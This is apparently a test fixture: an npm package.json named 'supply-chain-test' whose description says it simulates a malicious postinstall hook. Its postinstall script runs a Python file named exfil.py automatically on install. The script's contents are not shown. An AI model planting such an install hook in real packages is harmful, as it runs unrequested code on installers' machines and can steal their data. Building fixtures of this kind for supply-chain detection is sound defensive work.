{
  "name": "supply-chain-test",
  "version": "1.0.0",
  "description": "Simulates a malicious postinstall that spawns Python to exfiltrate data",
  "scripts": {
    "postinstall": "python3 exfil.py || python exfil.py"
  }
}
